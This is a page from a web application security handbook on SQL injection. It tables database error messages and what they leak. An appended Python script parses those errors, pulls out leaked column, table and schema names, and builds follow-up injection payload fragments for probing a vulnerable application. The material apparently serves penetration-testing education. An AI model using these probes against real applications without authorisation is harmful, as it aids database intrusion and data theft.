The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws




Chapter 9  Injecting Code  293




MySQL:
You have an error in your SQL syntax.  Check the manual that corresponds to your MySQL server version for the right syntax to use near ' XXX , YYY from SOME_TABLE' at line 1

Translation:
You commonly see this error message when your injection point occurs before the FROM keyword (for example, you have injected into the columns to be returned) and/or you have used the comment character to remove required SQL keywords. Try completing the SQL statement yourself while using your comment character. MySQL should helpfully reveal the column names XXX, YYY when this condition is encountered.


Oracle:
ORA-00972: identifier is too long

MS-SQL:
String or binary data would be truncated.

MySQL:
N/A

Translation:
This does not indicate SQL injection. You may see this error message if you have entered a long string. You're not likely to get a buffer overflow here either, as the database is handling your input safely.


Oracle:
ORA-00942: table or view does not exist

MS-SQL:
Msg 208, Level 16, State 1, Line 1
Invalid object name 'foo'

MySQL:
Table 'DBNAME.SOMETABLE' doesn't exist

Translation:
Either you are trying to access a table or view that does not exist, or in the case of Oracle, the database user does not have privileges for the table or view. Test your query against a table you know you have access to, such as DUAL. MySQL should helpfully reveal the current database schema DBNAME when this condition is encountered.


Oracle:
ORA-00920: invalid relational operator

MS-SQL:
Msg 170, Level 15, State 1, Line 1
Line 1: Incorrect syntax near foo

MySQL:
You have an error in your SQL syntax.  Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Translation:
You were probably altering something in a WHERE clause, and your SQL injection attempt has disrupted the grammar.
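The table above is easiest to apply when the error text coming back from the application is parsed mechanically. The Python below is an added example, not code from the book: it fingerprints which DBMS produced an error message, maps it to the "translation" rows above, pulls out whatever identifiers the message leaks (the column names and table after "near '...'", the DBNAME.SOMETABLE pair, the MS-SQL object name or token), and suggests the follow-up probe the table recommends (complete the statement yourself, or retry against DUAL). The sample messages are constructed from the wording on this page, the condition names are this example's own labels, and the probe fragments (a leading "1" and a trailing "-- " comment) are illustrative assumptions, not the book's payloads.

```python
import re
from dataclasses import dataclass, field

# Constructed sample error messages, not captured from any real target. The
# wording follows the MySQL, Oracle and MS-SQL messages quoted on this page.
SAMPLE_ERRORS = [
    "You have an error in your SQL syntax.  Check the manual that corresponds "
    "to your MySQL server version for the right syntax to use "
    "near ' XXX , YYY from SOME_TABLE' at line 1",
    "ORA-00972: identifier is too long",
    "String or binary data would be truncated.",
    "ORA-00942: table or view does not exist",
    "Msg 208, Level 16, State 1, Line 1\nInvalid object name 'foo'",
    "Table 'DBNAME.SOMETABLE' doesn't exist",
    "ORA-00920: invalid relational operator",
    "Msg 170, Level 15, State 1, Line 1\nLine 1: Incorrect syntax near foo",
    "You have an error in your SQL syntax.  Check the manual that corresponds "
    "to your MySQL server version for the right syntax to use near '' at line 1",
]


@dataclass
class Verdict:
    dbms: str                                    # "mysql", "oracle", "mssql", "unknown"
    condition: str                               # label for the matching "Translation" row
    leaked: dict = field(default_factory=dict)   # identifiers the message gives away


def _normalise(msg: str) -> str:
    # Web pages and extraction tools often turn the ASCII quote into curly quotes.
    return msg.replace("\u2018", "'").replace("\u2019", "'").replace("\n", " ")


def classify_sql_error(msg: str) -> Verdict:
    text = _normalise(msg)

    # MySQL: the text after "near '" is the unparsed remainder of the statement,
    # so it exposes whatever followed the injection point.
    m = re.search(r"for the right syntax to use near '(?P<frag>.*?)' at line \d+", text)
    if m:
        frag = m.group("frag").strip()
        if not frag:
            return Verdict("mysql", "where_clause_grammar_broken")
        ct = re.match(r"(?P<cols>.+?)\s+from\s+(?P<table>[\w.]+)", frag, re.I)
        if ct:
            cols = [c.strip() for c in ct.group("cols").split(",")]
            return Verdict("mysql", "injection_before_from",
                           {"columns": cols, "table": ct.group("table")})
        return Verdict("mysql", "syntax_error", {"fragment": frag})

    m = re.search(r"Table '(?P<schema>\w+)\.(?P<table>\w+)' doesn't exist", text)
    if m:
        return Verdict("mysql", "missing_table",
                       {"schema": m.group("schema"), "table": m.group("table")})

    m = re.match(r"ORA-(?P<code>\d{5}):", text)
    if m:
        ora = {"00972": "long_identifier_not_injection",
               "00942": "missing_table_or_no_privilege",
               "00920": "where_clause_grammar_broken"}
        return Verdict("oracle", ora.get(m.group("code"), "unclassified"),
                       {"ora_code": m.group("code")})

    if "String or binary data would be truncated" in text:
        return Verdict("mssql", "long_input_not_injection")

    m = re.search(r"Msg (?P<num>\d+), Level \d+, State \d+, Line \d+\s*(?P<detail>.*)", text)
    if m:
        num, detail = m.group("num"), m.group("detail")
        if num == "208":
            obj = re.search(r"Invalid object name '(?P<obj>[^']*)'", detail)
            return Verdict("mssql", "missing_table",
                           {"object": obj.group("obj") if obj else None})
        if num == "170":
            tok = re.search(r"Incorrect syntax near (?P<tok>\S+)", detail)
            return Verdict("mssql", "where_clause_grammar_broken",
                           {"token": tok.group("tok") if tok else None})
        return Verdict("mssql", "unclassified", {"msg_number": num})

    return Verdict("unknown", "unclassified")


def suggested_probe(v: Verdict) -> str:
    """Next step the table recommends, as a payload fragment for the injection
    point. The leading '1' and trailing '-- ' comment are this example's
    assumptions; adapt both to the statement and comment syntax you are in."""
    if v.condition == "injection_before_from":
        # Re-supply the FROM clause the comment character removed, keeping the
        # leaked column list so the statement stays a complete, valid SELECT.
        cols = ", ".join(v.leaked["columns"])
        return f"1, {cols} FROM {v.leaked['table']} -- "
    if v.condition == "missing_table_or_no_privilege":
        return "1 FROM DUAL -- "   # a table every Oracle user can read
    return ""


if __name__ == "__main__":
    for err in SAMPLE_ERRORS:
        v = classify_sql_error(err)
        print(f"{v.dbms:7} {v.condition:32} {v.leaked}  probe={suggested_probe(v)!r}")
```

Feed it the raw response body of an application that echoes database errors; a match on the first pattern with non-empty leaked columns is the strongest signal on this page, because it hands you both the column names and the table needed to finish the statement yourself.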

